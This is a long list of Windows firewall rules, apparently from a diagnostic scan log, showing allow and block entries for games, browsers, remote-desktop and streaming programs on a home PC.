FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
